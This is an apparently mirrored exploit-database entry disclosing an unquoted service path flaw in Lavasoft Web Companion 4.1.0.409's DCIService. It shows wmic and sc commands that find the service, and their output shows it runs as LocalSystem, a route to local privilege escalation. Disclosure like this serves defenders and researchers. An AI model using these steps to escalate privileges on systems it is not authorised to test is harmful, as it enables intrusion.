Share
## https://sploitus.com/exploit?id=PACKETSTORM:171594
#Exploit Title: Lavasoft web companion 4.1.0.409 - 'DCIservice' Unquoted Service Path  
# Author: P4p4 M4n3  
# Discovery Date: 25-11-2022  
# Vendor Homepage: https://webcompanion.com/en/  
# Version 4.1.0.409  
# Tested on: Microsoft Windows Server 2019 Datacenter x64  
  
# Description:  
# Lavasoft 4.1.0.409 install DCIservice as a service with an unquoted service path  
# POC https://youtu.be/yb8AavCMbes   
  
#Discover the Unquoted Service path  
  
C:\Users\p4p4\> wmic service get name,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """  
  
DCIService C:\Program Files (x86)\Lavasoft\Web Companion\Service\x64\DCIService.exe Auto   
  
  
C:\Users\p4p4> sc qc DCIService  
[SC] QueryServiceConfig réussite(s)  
  
SERVICE_NAME: DCIService  
TYPE : 10 WIN32_OWN_PROCESS  
START_TYPE : 2 AUTO_START  
ERROR_CONTROL : 1 NORMAL  
BINARY_PATH_NAME : C:\Program Files (x86)\Lavasoft\Web Companion\Service\x64\DCIService.exe  
LOAD_ORDER_GROUP :  
TAG : 0  
DISPLAY_NAME : DCIService  
DEPENDENCIES :  
SERVICE_START_NAME : LocalSystem